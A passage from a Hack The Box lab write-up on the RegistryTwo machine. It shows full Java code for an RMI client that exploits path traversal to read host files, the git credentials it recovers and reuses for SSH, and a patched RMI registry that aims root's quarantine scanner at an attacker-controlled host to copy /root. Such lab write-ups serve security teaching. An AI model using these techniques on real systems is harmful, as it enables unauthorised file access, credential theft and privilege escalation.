tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5001 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3310 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 :::22 :::* LISTEN -
tcp 0 0 :::443 :::* LISTEN -
tcp 0 0 :::45919 :::* LISTEN -
tcp 0 0 ::ffff:127.0.0.1:8005 :::* LISTEN 1/java
tcp 0 0 :::5000 :::* LISTEN -
tcp 0 0 :::8009 :::* LISTEN 1/java
tcp 0 0 :::5001 :::* LISTEN -
tcp 0 0 :::9002 :::* LISTEN -
tcp 0 0 :::3306 :::* LISTEN -
tcp 0 0 :::3310 :::* LISTEN -
tcp 0 0 :::8080 :::* LISTEN 1/java
It kind of looks like it’s only open on IPv6 (which I’ll come back to in Beyond Root for an unintended shortcut), but it is open on IPv4 as well:
bash-4.4$ nc -zv 127.0.0.1 9002
127.0.0.1 (127.0.0.1:9002) open
It’s not immediately clear because of how Docker is networking, but the RMI service is on the host.
I already abused the RMI connection with a deserialization attack to get execution in the container. I was able to do that just by seeing that RMI was in use, without actually looking at how it is used. The `FileService` object (defined in `com.htb.hosting.rmi.FileService.class`) is an `interface`, which is like an abstract class in Java. It defines methods, what arguments they take, and the type of the return value, without actually giving any of the code that does that. This allows the code here to create a `FileService` object and call the methods without having the actual implementation.
package WEB-INF.classes.com.htb.hosting.rmi;
import com.htb.hosting.rmi.AbstractFile;
import java.io.IOException;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.util.List;
public interface FileService extends Remote {
List<AbstractFile> list(String paramString1, String paramString2) throws RemoteException;
boolean uploadFile(String paramString1, String paramString2, byte[] paramArrayOfbyte) throws IOException;
boolean delete(String paramString) throws RemoteException;
boolean createDirectory(String paramString1, String paramString2) throws RemoteException;
byte[] view(String paramString1, String paramString2) throws IOException;
AbstractFile getFile(String paramString1, String paramString2) throws RemoteException;
AbstractFile getFile(String paramString) throws RemoteException;
void deleteDomain(String paramString) throws RemoteException;
boolean newDomain(String paramString) throws RemoteException;
byte[] view(String paramString) throws RemoteException;
}
There is some remote file store, and this is how to interact with it. This class uses the `AbstractFile` object, which is just a class that holds metadata about a file such as the display name, whether it's a directory, the size, the permissions, etc. The `list` method returns an array of these objects.
The `RMIClientWrapper` object has a single method, `get`, that initializes and returns a `FileService` object:
public class RMIClientWrapper {
private static final Logger log = Logger.getLogger(com.htb.hosting.rmi.RMIClientWrapper.class.getSimpleName());
public static FileService get() {
try {
String rmiHost = (String)Settings.get(String.class, "rmi.host", null);
if (!rmiHost.contains(".htb"))
rmiHost = "registry.webhosting.htb";
System.setProperty("java.rmi.server.hostname", rmiHost);
System.setProperty("com.sun.management.jmxremote.rmi.port", "9002");
log.info(String.format("Connecting to %s:%d", new Object[] { rmiHost, Settings.get(Integer.class, "rmi.port", Integer.valueOf(9999)) }));
Registry registry = LocateRegistry.getRegistry(rmiHost, ((Integer)Settings.get(Integer.class, "rmi.port", Integer.valueOf(9999))).intValue());
return (FileService)registry.lookup("FileService");
} catch (Exception e) {
e.printStackTrace();
throw new RuntimeException(e);
}
}
}
This is the code where I had to use the null byte to have it both contact my IP and contain ".htb".
`com.htb.hosting.services.DomainServlet` is a primary user of the `FileService` object. This servlet is responsible for creating domains, and for adding, editing, and deleting files on them. For example, when it creates a new domain, it does that via the `FileService` (for some reason it seems to get a new one each time with `RMIClientWrapper.get()`), and then uploads the default `index.html` to that vhost:
Most of the functions seem to take a VHost name along with additional parameters as makes sense for that task.

Imagining what is likely happening: when a VHost is created, it gets a directory that serves as the root for the webserver.
I’ll create my own client to read and list files on the RMI host.
Java can be finicky about how it gets compiled. I'll download and follow the install instructions for the IntelliJ IDEA Community Edition. I'll create a new project and give it a location and name:
It starts an empty project:
For this to work, I'm going to use some of the code from `hosting-app.war`. The directory structure matters in Java, so I'll mirror what's in the WAR. I'll right click on `src` and select New -> Package, and name it `com.htb.hosting.rmi`. On it, I'll add a New File, and name it `AbstractFile.java`. I'll copy all the code from `jd-gui` for that file and paste it in here. The only change I need to make is that the package at the top is no longer `WEB-INF.classes.com.htb.hosting.rmi`, but rather just `com.htb.hosting.rmi`. I'll do the same for `FileService.class`.
I'll do the same thing with `RMIClientWrapper.java`, but this one needs a bit more editing. It is loading the `com.htb.hosting.utils.config.Settings` class to get things like the name of the server to connect to. I'll remove that import and modify the code to just connect to `registry.webhosting.htb`:
package com.htb.hosting.rmi;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.util.logging.Logger;
public class RMIClientWrapper {
private static final Logger log = Logger.getLogger(com.htb.hosting.rmi.RMIClientWrapper.class.getSimpleName());
public static FileService get() {
try {
String rmiHost = "registry.webhosting.htb";
Registry registry = LocateRegistry.getRegistry(rmiHost, 9002);
return (FileService)registry.lookup("FileService");
} catch (Exception e) {
e.printStackTrace();
throw new RuntimeException(e);
}
}
}
I'll add a `Main` Java class at the root of `src`:
With a bit of playing around, I'll build a Java program that will read files and list directories. I'm going to show just my final project, but it took many iterations of adding something, running it, looking at the results, and updating to get here. Getting direct access to the RMI port, either using the IPv6 unintended path I cover in Beyond Root or tunneling with Chisel, makes this go much faster, but I'll show the intended path here for completeness.
My `Main` class ends up as:
import com.htb.hosting.rmi.AbstractFile;
import com.htb.hosting.rmi.FileService;
import com.htb.hosting.rmi.RMIClientWrapper;
import java.util.List;
public class Main {
public static void usage() {
System.out.println("Usage: exploit [vhost] [cmd] [path]\n cmd is ls or cat");
System.exit(0);
}
public static void main(String[] args) {
FileService fileService = RMIClientWrapper.get();
if (args.length != 3) {
usage();
}
try {
if (args[1].equals("cat")) {
byte[] result = fileService.view(args[0], "../../" + args[2]);
System.out.println(new String(result));
} else if (args[1].equals("ls")) {
List<AbstractFile> files = fileService.list(args[0], "../../" + args[2]);
for (AbstractFile file : files) {
System.out.println(file.getDisplayName());
}
} else {
System.out.println("Unknown command: " + args[1]);
usage();
}
} catch (Exception ex) {
System.out.println("Something went wrong");
usage();
}
}
}
It takes in a vhost id, cmd of “ls” or “cat”, and file path as arguments.
If I build this with a modern version of Java, when I try to run it on the container on RegistryTwo, it will fail:
bash-4.4$ java -jar EvilRMI.jar c0a4a2cfd9ce ls .
Error: A JNI error has occurred, please check your installation and try again
Exception in thread "main" java.lang.UnsupportedClassVersionError: Main has been compiled by a more recent version of the Java Runtime (class file version 61.0), this version of the Java Runtime only recognizes
class file versions up to 52.0
at java.lang.ClassLoader.defineClass1(Native Method)
at java.lang.ClassLoader.defineClass(ClassLoader.java:763)
at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:142)
at java.net.URLClassLoader.defineClass(URLClassLoader.java:467)
at java.net.URLClassLoader.access$100(URLClassLoader.java:73)
at java.net.URLClassLoader$1.run(URLClassLoader.java:368)
at java.net.URLClassLoader$1.run(URLClassLoader.java:362)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(URLClassLoader.java:361)
at java.lang.ClassLoader.loadClass(ClassLoader.java:424)
at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:335)
at java.lang.ClassLoader.loadClass(ClassLoader.java:357)
at sun.launcher.LauncherHelper.checkAndLoadMain(LauncherHelper.java:495)
There's a table on this Stack Overflow answer that shows what version of Java maps to what major version. I need to go back to Java 8. I'll run `sudo apt install openjdk-8-jdk`, and then in File -> Project Structure, on the Project tab, select that JDK (Java 8 shows as 1.8 for some reason):
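The mapping behind that table is simple arithmetic: the class-file major version is the Java feature version plus 44, so the 61.0 in the error is Java 17 and the 52.0 the container supports is Java 8. A quick check:

```java
public class ClassFileVersions {
    public static void main(String[] args) {
        // Class-file major version = Java (feature) version + 44.
        int[] majors = {52, 55, 61};
        for (int major : majors) {
            System.out.println("major " + major + " -> Java " + (major - 44));
        }
    }
}
```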
To run this, I’ll have IDEA build a JAR file. First, I’ll need to add an artifact output under File -> Project Structure, then under the Artifacts menu click the “+” -> JAR -> From module with dependencies…:
I'll select `Main` as my Main Class and click OK to get out.
Now under Build > Build Artifacts, I'll select EvilRMI:jar -> Rebuild, and it generates `EvilRMI.jar`:
I'll upload `EvilRMI.jar` to the container on RegistryTwo:
bash-4.4$ wget 10.10.14.6/EvilRMI.jar
Connecting to 10.10.14.6 (10.10.14.6:80)
EvilRMI.jar 100% |*******************************| 4741 0:00:00 ETA
I'll run it, giving it one of the domains from the list on the website, and the `ls` command with `.` to list the current directory:
bash-4.4$ java -jar EvilRMI.jar c0a4a2cfd9ce ls .
..
initrd.img
opt
sbin
snap
root
var
proc
mnt
vmlinuz
vmlinuz.old
boot
tmp
initrd.img.old
cdrom
home
lib64
quarantine
run
dev
sys
etc
media
usr
srv
lib
sites
lost+found
bin
When I first built the client, this was based in the `/sites/[vhost]` directory and showed `index.html`. As I played with the development, it was easier to add the `../../` in the code so that it based out of `/`.
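Assuming the server resolves the client-supplied name under a per-vhost root in `/sites` (an assumption consistent with the directory listings), path normalization shows why two `../` segments walk back to the filesystem root:

```java
import java.nio.file.Path;

public class TraversalSketch {
    public static void main(String[] args) {
        // Hypothetical server-side resolution: /sites/<vhost dir>/<client name>.
        Path base = Path.of("/sites", "www.static-c0a4a2cfd9ce.webhosting.htb");

        // The two "../" cancel the two directories under /, rooting the
        // request at the filesystem root.
        Path resolved = base.resolve("../../home/developer/.git-credentials").normalize();
        System.out.println(resolved);
    }
}
```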
With this ability to list directories and read files, I’ll look at the filesystem. There’s a single home directory:
bash-4.4$ java -jar EvilRMI.jar c0a4a2cfd9ce ls /home
..
developer
Whatever user this is running as can read it:
bash-4.4$ java -jar EvilRMI.jar c0a4a2cfd9ce ls /home/developer
..
.cache
.bash_logout
.bashrc
.bash_history
.git-credentials
user.txt
.gnupg
.profile
.vimrc
`.git-credentials` is interesting:
bash-4.4$ java -jar EvilRMI.jar c0a4a2cfd9ce cat /home/developer/.git-credentials
https://irogir:qybWiMTRg0sIHz4beSTUzrVIl7t3YsCj9@github.com
Those creds work for the developer user over SSH:
oxdf@hacky$ sshpass -p qybWiMTRg0sIHz4beSTUzrVIl7t3YsCj9 ssh developer@webhosting.htb
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-213-generic x86_64)
...[snip]...
developer@registry:~$
And get `user.txt`:
developer@registry:~$ cat user.txt
25044958************************
This appears to be the host system. The developer user’s home directory doesn’t have anything else of interest:
developer@registry:~$ ls -la
total 40
drwxr-xr-x 4 developer developer 4096 Jul 5 2023 .
drwxr-xr-x 3 root root 4096 Jul 5 2023 ..
lrwxrwxrwx 1 developer developer 9 Mar 27 2023 .bash_history -> /dev/null
-rw-r--r-- 1 developer developer 220 Mar 26 2023 .bash_logout
-rw-r--r-- 1 developer developer 3771 Mar 26 2023 .bashrc
drwx------ 2 developer developer 4096 Jul 5 2023 .cache
-rw-r--r-- 1 developer developer 60 Mar 26 2023 .git-credentials
drwx------ 3 developer developer 4096 Jul 5 2023 .gnupg
-rw-r--r-- 1 developer developer 807 Mar 26 2023 .profile
-rw-r----- 1 root developer 33 Jan 26 20:49 user.txt
-rw-r--r-- 1 developer developer 39 Jun 16 2023 .vimrc
The various websites are in `/sites`:
developer@registry:/sites$ ls
www.static-482f6175cb85.webhosting.htb www.static-68d01707c93f.webhosting.htb www.static-e492442a4be9.webhosting.htb
www.static-5403e43655a0.webhosting.htb www.static-950ba61ab119.webhosting.htb www.static-e511acc71eed.webhosting.htb
www.static-5762637d572b.webhosting.htb www.static-c0a4a2cfd9ce.webhosting.htb www.static-f7200b8c1225.webhosting.htb
www.static-5a9d1f63c28c.webhosting.htb www.static-dd1305ddf270.webhosting.htb www.webhosting.htb
I’ll dig a bit more into how the website is configured in Beyond Root, but it’s not important for escalating to root.
The only thing really interesting on this file system is in `/opt`:
developer@registry:/opt$ ls
containerd registry.jar
pspy shows there are a few different crons running on this host:
- /root/tomcat-app/reset.sh, which uses sleeps in a loop to effectively reset the Tomcat settings every 10 seconds.
- /usr/local/sbin/vhosts-manage -m quarantine - every minute
- systemctl restart registry.service - every three minutes

vhosts-manage is an ELF binary:
developer@registry:~$ file /usr/local/sbin/vhosts-manage
/usr/local/sbin/vhosts-manage: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6ca6e5eb6a2863662d6c620d59fed33db34da2b4, with debug_info, not stripped
vhosts-manage runs a JAR file. It doesn’t run for very long, so pspy often misses it, but it does catch it occasionally:
2024/01/30 19:48:01 CMD: UID=0 PID=18869 | /usr/local/sbin/vhosts-manage -m quarantine
2024/01/30 19:48:01 CMD: UID=0 PID=18871 | /usr/bin/java -jar /usr/share/vhost-manage/includes/quarantine.jar
If I run pspy with -f for file system events, it catches it all the time:
2024/01/30 20:15:01 CMD: UID=0 PID=21075 | /usr/local/sbin/vhosts-manage -m quarantine
2024/01/30 20:15:01 FS: OPEN | /usr/lib/jvm/java-17-openjdk-amd64/bin/java
2024/01/30 20:15:01 FS: ACCESS | /usr/lib/jvm/java-17-openjdk-amd64/bin/java
2024/01/30 20:15:01 FS: OPEN | /usr/lib/jvm/java-17-openjdk-amd64/lib/libjli.so
2024/01/30 20:15:01 FS: ACCESS | /usr/lib/jvm/java-17-openjdk-amd64/lib/libjli.so
2024/01/30 20:15:01 FS: OPEN | /usr/share/vhost-manage/includes/quarantine.jar
2024/01/30 20:15:01 FS: ACCESS | /usr/share/vhost-manage/includes/quarantine.jar
2024/01/30 20:15:01 FS: ACCESS | /usr/share/vhost-manage/includes/quarantine.jar
2024/01/30 20:15:01 FS: ACCESS | /usr/share/vhost-manage/includes/quarantine.jar
2024/01/30 20:15:01 FS: CLOSE_NOWRITE | /usr/share/vhost-manage/includes/quarantine.jar
The includes directory is a string in vhosts-manage, and if I had to guess, I’d suggest -m is giving it a module to load. quarantine.jar is the only file in /usr/share/vhost-manage/includes:
developer@registry:~$ ls /usr/share/vhost-manage/includes/
quarantine.jar
I’ll bring a copy back to my VM, and (after verifying the hashes match) open it in jd-gui. Its files are all in com.htb.hosting.rmi, and it seems to have to do with ClamAV:
The main function gets a Client and calls scan():
package com.htb.hosting.rmi;

public class Main {
    public static void main(String[] args) {
        try {
            (new Client()).scan();
        } catch (Throwable e) {
            Client.out(1024, "an unknown error occurred", new Object[0]);
            e.printStackTrace();
        }
    }
}
The Client constructor connects to the same local RMI instance on 9002 and gets a configuration, using that to create a ClamScan instance:
public Client() throws RemoteException, NotBoundException {
    Registry registry = LocateRegistry.getRegistry("localhost", 9002);
    QuarantineService server = (QuarantineService)registry.lookup("QuarantineService");
    this.config = server.getConfiguration();
    this.clamScan = new ClamScan(this.config);
}
scan is simple as well. It gets the directory from the config, gets the files from the directory, and then loops over them calling doScan:
public void scan() {
    File[] documentRoots = this.config.getMonitorDirectory().listFiles();
    if (documentRoots == null || documentRoots.length == 0) {
        out(256, "exiting", new Object[0]);
        return;
    }
    out("initialize scan for %d domains", new Object[] { Integer.valueOf(documentRoots.length) });
    for (File documentRoot : documentRoots)
        doScan(documentRoot);
}
doScan checks if it’s been passed a directory, and if so, loops over the contents, passing them to itself. If not, it runs clamScan.scanPath on the file, and if that returns FAILED, passes the file to quarantine:
private void doScan(File file) {
    if (file.isDirectory()) {
        File[] files = file.listFiles();
        if (files != null)
            for (File f : files)
                doScan(f);
    } else {
        try {
            Path path = file.toPath();
            try {
                if (Files.isSymbolicLink(path)) {
                    out(16, "skipping %s", new Object[] { file.getAbsolutePath() });
                    return;
                }
            } catch (Exception e) {
                out(16, "unknown error occurred when processing %s\n", new Object[] { file });
                return;
            }
            ScanResult scanResult = this.clamScan.scanPath(path.toAbsolutePath().toString());
            switch (scanResult.getStatus()) {
                case ERROR:
                    out(768, "there was an error when checking %s", new Object[] { file.getAbsolutePath() });
                    break;
                case FAILED:
                    out(32, "%s was identified as a potential risk. applying quarantine ...", new Object[] { file.getAbsolutePath() });
                    quarantine(file);
                    break;
                case PASSED:
                    out(0, "%s status ok", new Object[] { file.getAbsolutePath() });
                    break;
            }
        } catch (IOException e) {
            out(512, "io error processing %s", new Object[] { file.getAbsolutePath() });
        }
    }
}
quarantine simply copies the file to a folder specified in the config.
The ClamScan class constructor loads the configuration:
public ClamScan(QuarantineConfiguration quarantineConfiguration) {
    setHost(quarantineConfiguration.getClamHost());
    setPort(quarantineConfiguration.getClamPort());
    setTimeout(quarantineConfiguration.getClamTimeout());
}
The scanPath method connects to the host over a socket, sends data about the file, gets a response, and turns it into a ScanResult object:
public ScanResult scanPath(String path) throws IOException {
    Socket socket = new Socket();
    try {
        socket.connect(new InetSocketAddress(getHost(), getPort()));
    } catch (IOException e) {
        Client.out(768, "could not connect to clamd server", new Object[0]);
        return new ScanResult(e);
    }
    try {
        socket.setSoTimeout(getTimeout());
    } catch (SocketException e) {
        Client.out(768, "could not set socket timeout to " + getTimeout() + "ms", new Object[0]);
    }
    DataOutputStream dos = null;
    String response = "";
    try {
        int read;
        try {
            dos = new DataOutputStream(socket.getOutputStream());
        } catch (IOException e) {
            Client.out(768, "could not open socket OutputStream", new Object[0]);
            return new ScanResult(e);
        }
        try {
            byte[] b = String.format("zSCAN %s\000", new Object[] { path }).getBytes();
            dos.write(b);
        } catch (IOException e) {
            Client.out(768, "error writing SCAN command", new Object[0]);
            return new ScanResult(e);
        }
        byte[] buffer = new byte[2048];
        try {
            read = socket.getInputStream().read(buffer);
        } catch (IOException e) {
            Client.out(768, "error reading result from socket", new Object[0]);
            read = 0;
        }
        if (read > 0)
            response = new String(buffer, 0, read);
    } finally {
        if (dos != null)
            try {
                dos.close();
            } catch (IOException e) {
                Client.out(768, "exception closing DOS", new Object[0]);
            }
        try {
            socket.close();
        } catch (IOException e) {
            Client.out(768, "exception closing socket", new Object[0]);
        }
    }
    return new ScanResult(response.trim());
}
The response string is used to create a ScanResult object that is returned.
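The wire format that scanPath sends is simple: the literal string zSCAN, a space, the path, and a terminating NUL byte. As a quick sketch of that framing in Python (the helper name build_zscan is my own, not from the JAR):

```python
def build_zscan(path: str) -> bytes:
    # Mirrors the Java String.format("zSCAN %s\000", path).getBytes():
    # command name, a space, the path, and a trailing NUL byte.
    return f"zSCAN {path}\x00".encode()

print(build_zscan("/etc/passwd"))  # b'zSCAN /etc/passwd\x00'
```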
/etc/systemd/system/registry.service defines the registry service:
[Unit]
Description=rmi registry service
After=network.target
StartLimitIntervalSec=0
[Service]
Type=simple
Restart=always
RestartSec=1
User=rmi-service
ExecStart=/usr/lib/jvm/java-11-openjdk-amd64/bin/java -jar /opt/registry.jar
[Install]
WantedBy=multi-user.target
It’s running the registry.jar noted above, as the rmi-service user. It’s not clear yet if that user is a target or not.
The registry.jar file is the RMI server. It is built from the same com.htb.hosting.rmi package:
Server has the main function, creating an RMI registry listening on 9002 and giving it two services, FileService and QuarantineService:
public class Server {
    public static void main(String[] args) throws Exception {
        int port = 9002;
        System.setProperty("java.rmi.server.hostname", "registry.webhosting.htb");
        Registry registry = LocateRegistry.createRegistry(9002);
        System.out.printf("[+] Bound to %d\n", new Object[] { Integer.valueOf(9002) });
        FileService fileService = new FileServiceImpl();
        FileService fileServiceStub = (FileService)UnicastRemoteObject.exportObject(fileService, 0);
        registry.bind("FileService", fileServiceStub);
        QuarantineServiceImpl quarantineServiceImpl = new QuarantineServiceImpl();
        QuarantineService quarantineServiceStub = (QuarantineService)UnicastRemoteObject.exportObject((Remote)quarantineServiceImpl, 0);
        registry.bind("QuarantineService", (Remote)quarantineServiceStub);
    }
}
The FileService is something I’ve already explored. It’s got the same interface in FileService.class, but that class is implemented in FileServiceImpl.class.
The more interesting bit is the quarantine functionality. The QuarantineService and QuarantineServiceImpl classes offer only one method besides the constructor:
public class QuarantineServiceImpl implements QuarantineService {
    private static final Logger logger = Logger.getLogger(QuarantineServiceImpl.class.getSimpleName());
    private static final QuarantineConfiguration DEFAULT_CONFIG = new QuarantineConfiguration(new File("/root/quarantine"), FileServiceConstants.SITES_DIRECTORY, "localhost", 3310, 1000);

    public QuarantineConfiguration getConfiguration() throws RemoteException {
        logger.info("client fetching configuration");
        return DEFAULT_CONFIG;
    }
}
The default configuration is to quarantine to /root/quarantine, scan /sites, and talk to ClamAV on localhost:3310 with a one second timeout.
Every three minutes, the registry server restarts: it stops listening on 9002, and then starts listening on 9002 again. That means if I can start my own rogue registry service in that window, I can take over the registry service.
Every minute, the quarantine process loads a configuration from the RMI registry. It then scans a folder, connects to a ClamAV server, and based on the response, may copy the scanned file to a quarantine folder. The scanned folder, the IP and port of the ClamAV server, and the quarantine folder are all specified in the configuration from the registry.
I’m going to have a rogue registry server return a configuration that scans /root, contacts me as the ClamAV server, and quarantines to a folder I can read, giving me a full copy of /root.
I’ll open registry.jar in Recaf, a very neat tool that can edit JAR files. The class I need to modify is QuarantineServiceImpl, where it generates the QuarantineConfiguration object:

The arguments for the object are the directory to quarantine to, the directory to scan, the clam host, the clam port, and the timeout. I’ll update that line to:
private static final QuarantineConfiguration DEFAULT_CONFIG = new QuarantineConfiguration(new File("/dev/shm"), new File("/root/"), "10.10.14.6", 3310, 1000);
I’ll export the new JAR as registry-0xdf.jar.
The simplest way to root this box is just to use nc as the ClamAV server. I don’t think this was supposed to work, but it does.
I’ll upload registry-0xdf.jar to RegistryTwo. Running it will almost certainly throw a BindException:
developer@registry:/dev/shm$ java -jar registry-0xdf.jar
Exception in thread "main" java.rmi.server.ExportException: Port already in use: 9002; nested exception is:
java.net.BindException: Address already in use
at java.rmi/sun.rmi.transport.tcp.TCPTransport.listen(TCPTransport.java:346)
at java.rmi/sun.rmi.transport.tcp.TCPTransport.exportObject(TCPTransport.java:243)
at java.rmi/sun.rmi.transport.tcp.TCPEndpoint.exportObject(TCPEndpoint.java:415)
at java.rmi/sun.rmi.transport.LiveRef.exportObject(LiveRef.java:147)
at java.rmi/sun.rmi.server.UnicastServerRef.exportObject(UnicastServerRef.java:235)
at java.rmi/sun.rmi.registry.RegistryImpl.setup(RegistryImpl.java:223)
at java.rmi/sun.rmi.registry.RegistryImpl.<init>(RegistryImpl.java:208)
at java.rmi/java.rmi.registry.LocateRegistry.createRegistry(LocateRegistry.java:203)
at com.htb.hosting.rmi.Server.main(Server.java:15)
Caused by: java.net.BindException: Address already in use
at java.base/sun.nio.ch.Net.bind0(Native Method)
at java.base/sun.nio.ch.Net.bind(Net.java:555)
at java.base/sun.nio.ch.Net.bind(Net.java:544)
at java.base/sun.nio.ch.NioSocketImpl.bind(NioSocketImpl.java:643)
at java.base/java.net.ServerSocket.bind(ServerSocket.java:388)
at java.base/java.net.ServerSocket.<init>(ServerSocket.java:274)
at java.base/java.net.ServerSocket.<init>(ServerSocket.java:167)
at java.rmi/sun.rmi.transport.tcp.TCPDirectSocketFactory.createServerSocket(TCPDirectSocketFactory.java:45)
at java.rmi/sun.rmi.transport.tcp.TCPEndpoint.newServerSocket(TCPEndpoint.java:673)
at java.rmi/sun.rmi.transport.tcp.TCPTransport.listen(TCPTransport.java:335)
... 8 more
That’s because the real registry is already bound on 9002. I’ll use this loop to constantly start my registry until it works:
while ! java -jar registry-0xdf.jar 2>/dev/null; do printf "\r%s" "$(date)"; done
It will try to run the registry and if it works, exit the loop. Otherwise, it prints the date on the screen so I can watch the time increase towards a minute divisible by three:
Once the service resets, my rogue registry grabs the port and the real one fails, typically one second after the reset. The next minute, when the scan starts, I’ll start getting connections to my nc listener, which I run with nc -lnvkp 3310. The -k allows that single listener to accept multiple connections.
oxdf@hacky$ nc -lvnkp 3310
Listening on 0.0.0.0 3310
Connection received on 10.10.11.223 35118
zSCAN /root/.docker/buildx/.lockConnection received on 10.10.11.223 35126
zSCAN /root/.docker/buildx/currentConnection received on 10.10.11.223 35136
zSCAN /root/.docker/.buildNodeIDConnection received on 10.10.11.223 35148
zSCAN /root/.docker/.token_seed.lockConnection received on 10.10.11.223 35152
zSCAN /root/.docker/config.jsonConnection received on 10.10.11.223 35160
zSCAN /root/.docker/.token_seedConnection received on 10.10.11.223 35176
zSCAN /root/.lesshstConnection received on 10.10.11.223 35188
...[snip]...
This moves really slowly. The nc connection hangs open until the client times out, then it moves to the next file, and there are a lot of files. I don’t believe this was supposed to work, but it does - the files are quarantined:
developer@registry:/dev/shm$ ls
quarantine-run-2024-01-31T15:38:27.565107283 quarantine-run-2024-01-31T15:38:34.993189226 quarantine-run-2024-01-31T15:38:42.548797705
quarantine-run-2024-01-31T15:38:27.753866048 quarantine-run-2024-01-31T15:38:35.188953456 quarantine-run-2024-01-31T15:38:42.741363684
quarantine-run-2024-01-31T15:38:27.940511288 quarantine-run-2024-01-31T15:38:35.389759415 quarantine-run-2024-01-31T15:38:42.935289133
quarantine-run-2024-01-31T15:38:28.126540311 quarantine-run-2024-01-31T15:38:35.576085425 quarantine-run-2024-01-31T15:38:43.122035242
quarantine-run-2024-01-31T15:38:28.314376014 quarantine-run-2024-01-31T15:38:35.775290591 quarantine-run-2024-01-31T15:38:43.315574126
quarantine-run-2024-01-31T15:38:28.504268527 quarantine-run-2024-01-31T15:38:35.965004668 quarantine-run-2024-01-31T15:38:43.502664140
quarantine-run-2024-01-31T15:38:28.691709279 quarantine-run-2024-01-31T15:38:36.159227375 quarantine-run-2024-01-31T15:38:43.694310373
quarantine-run-2024-01-31T15:38:28.887762591 quarantine-run-2024-01-31T15:38:36.362928867 quarantine-run-2024-01-31T15:38:43.885759506
quarantine-run-2024-01-31T15:38:29.076483425 quarantine-run-2024-01-31T15:38:36.554182383 quarantine-run-2024-01-31T15:38:44.074739135
quarantine-run-2024-01-31T15:38:29.264766277 quarantine-run-2024-01-31T15:38:36.741290581 quarantine-run-2024-01-31T15:38:44.266947883
quarantine-run-2024-01-31T15:38:29.453268150 quarantine-run-2024-01-31T15:38:36.936020630 quarantine-run-2024-01-31T15:38:44.458115378
quarantine-run-2024-01-31T15:38:29.641858258 quarantine-run-2024-01-31T15:38:37.122417804 quarantine-run-2024-01-31T15:38:44.648628815
quarantine-run-2024-01-31T15:38:29.829106289 quarantine-run-2024-01-31T15:38:37.311152715 quarantine-run-2024-01-31T15:38:44.836004996
quarantine-run-2024-01-31T15:38:30.016599820 quarantine-run-2024-01-31T15:38:37.499389190 quarantine-run-2024-01-31T15:38:45.024569737
quarantine-run-2024-01-31T15:38:30.203721293 quarantine-run-2024-01-31T15:38:37.710029230 quarantine-run-2024-01-31T15:38:45.213802842
quarantine-run-2024-01-31T15:38:30.391650472 quarantine-run-2024-01-31T15:38:37.896403742 quarantine-run-2024-01-31T15:38:45.401849461
quarantine-run-2024-01-31T15:38:30.581197496 quarantine-run-2024-01-31T15:38:38.086732813 quarantine-run-2024-01-31T15:38:45.590774148
quarantine-run-2024-01-31T15:38:30.770517324 quarantine-run-2024-01-31T15:38:38.303797569 quarantine-run-2024-01-31T15:38:45.779301809
quarantine-run-2024-01-31T15:38:30.957946925 quarantine-run-2024-01-31T15:38:38.493119240 quarantine-run-2024-01-31T15:38:45.968093266
quarantine-run-2024-01-31T15:38:31.146062714 quarantine-run-2024-01-31T15:38:38.682914640 quarantine-run-2024-01-31T15:38:46.162644259
quarantine-run-2024-01-31T15:38:31.334928059 quarantine-run-2024-01-31T15:38:38.870295600 quarantine-run-2024-01-31T15:38:46.354489114
quarantine-run-2024-01-31T15:38:31.548550375 quarantine-run-2024-01-31T15:38:39.080112426 quarantine-run-2024-01-31T15:38:46.542343883
quarantine-run-2024-01-31T15:38:31.737135925 quarantine-run-2024-01-31T15:38:39.270579486 quarantine-run-2024-01-31T15:38:46.733970269
quarantine-run-2024-01-31T15:38:31.937834242 quarantine-run-2024-01-31T15:38:39.495741695 quarantine-run-2024-01-31T15:38:46.921844354
quarantine-run-2024-01-31T15:38:32.137803952 quarantine-run-2024-01-31T15:38:39.687413335 quarantine-run-2024-01-31T15:38:47.108012117
quarantine-run-2024-01-31T15:38:32.327866453 quarantine-run-2024-01-31T15:38:39.876715309 quarantine-run-2024-01-31T15:38:47.294763005
quarantine-run-2024-01-31T15:38:32.518394137 quarantine-run-2024-01-31T15:38:40.071941148 quarantine-run-2024-01-31T15:38:47.495398054
quarantine-run-2024-01-31T15:38:32.709811641 quarantine-run-2024-01-31T15:38:40.269791362 quarantine-run-2024-01-31T15:38:47.683618809
quarantine-run-2024-01-31T15:38:32.899408258 quarantine-run-2024-01-31T15:38:40.459516891 quarantine-run-2024-01-31T15:38:47.872446794
quarantine-run-2024-01-31T15:38:33.086934170 quarantine-run-2024-01-31T15:38:40.647931731 quarantine-run-2024-01-31T15:38:48.063708616
quarantine-run-2024-01-31T15:38:33.273078941 quarantine-run-2024-01-31T15:38:40.850089917 quarantine-run-2024-01-31T15:38:48.253123362
quarantine-run-2024-01-31T15:38:33.461460137 quarantine-run-2024-01-31T15:38:41.041608981 quarantine-run-2024-01-31T15:38:48.443913668
quarantine-run-2024-01-31T15:38:33.654801200 quarantine-run-2024-01-31T15:38:41.233143634 quarantine-run-2024-01-31T15:38:48.634081938
quarantine-run-2024-01-31T15:38:33.844774554 quarantine-run-2024-01-31T15:38:41.422876948 quarantine-run-2024-01-31T15:38:48.843981690
quarantine-run-2024-01-31T15:38:34.038609373 quarantine-run-2024-01-31T15:38:41.610882780 quarantine-run-2024-01-31T15:38:49.067259362
quarantine-run-2024-01-31T15:38:34.228551028 quarantine-run-2024-01-31T15:38:41.798567340 quarantine-run-2024-01-31T15:38:49.284299160
quarantine-run-2024-01-31T15:38:34.415150020 quarantine-run-2024-01-31T15:38:41.987391758 registry-0xdf.jar
quarantine-run-2024-01-31T15:38:34.616711968 quarantine-run-2024-01-31T15:38:42.173566725
quarantine-run-2024-01-31T15:38:34.804033717 quarantine-run-2024-01-31T15:38:42.361324793
Each directory has a file in it:
